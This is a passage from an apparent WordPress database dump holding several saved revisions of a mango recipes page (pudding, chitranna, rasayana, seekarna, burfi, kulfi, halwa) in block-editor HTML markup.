love.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Halwa Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces<br></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 15:34:05','2022-02-07 10:04:05','',745,'https://mangomitra.in/?p=794',0,'revision','',0),(796,1,'2022-02-07 15:36:59','2022-02-07 10:06:59','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>mango pudding recipe | mango pudding dessert | mango panna cotta<br>easy mango pudding recipe | mango pudding dessert | mango panna cotta<br>CourseDessert</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>CuisineItalian                                           Author: HEBBARS KITCHEN </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Ingredients for mango layer</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mavinakayi Chitranna Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Rasayana</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Seekarna</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>mango burfi recipe | mango barfi | mango coconut burfi recipe<br>easy mango burfi recipe | mango barfi | mango coconut burfi recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Coursesweet                            Cuisinesouth Indian                         Author: HEBBARS KITCHEN</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Kulfi Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Halwa Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces<br></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 15:36:59','2022-02-07 10:06:59','',745,'https://mangomitra.in/?p=796',0,'revision','',0),(798,1,'2022-02-07 15:39:38','2022-02-07 10:09:38','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>mango pudding recipe | mango pudding dessert | mango panna cotta<br>easy mango pudding recipe | mango pudding dessert | mango panna cotta<br>CourseDessert</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>CuisineItalian                                           Author: HEBBARS KITCHEN </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Ingredients for mango layer</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mavinakayi Chitranna Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Rasayana</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Seekarna</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>mango burfi recipe | mango barfi | mango coconut burfi recipe<br>easy mango burfi recipe | mango barfi | mango coconut burfi recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Coursesweet                            Cuisinesouth Indian                         Author: HEBBARS KITCHEN</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Kulfi Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>Mango Halwa Recipe</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces<br></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Ingredients</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Instructions</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 15:39:38','2022-02-07 10:09:38','',745,'https://mangomitra.in/?p=798',0,'revision','',0),(802,1,'2022-02-07 16:24:41','2022-02-07 10:54:41','','252-2529007_pudding-jelly-hd-png-download','','inherit','open','closed','','252-2529007_pudding-jelly-hd-png-download','','','2022-02-07 16:24:41','2022-02-07 10:54:41','',745,'https://mangomitra.in/wp-content/uploads/2022/02/252-2529007_pudding-jelly-hd-png-download.png',0,'attachment','image/png',0),(803,1,'2022-02-07 16:36:23','2022-02-07 11:06:23','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\"><strong>MANGO PUDDING RECIPE</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p><strong>MANGO RASAYANA</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\"><strong>MANGO SEEKARNA</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\"><strong>MANGO BURFI RECIPE</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\"><strong>MANGO KULFI RECIPE</strong></p>\n<!-- /wp:paragraph 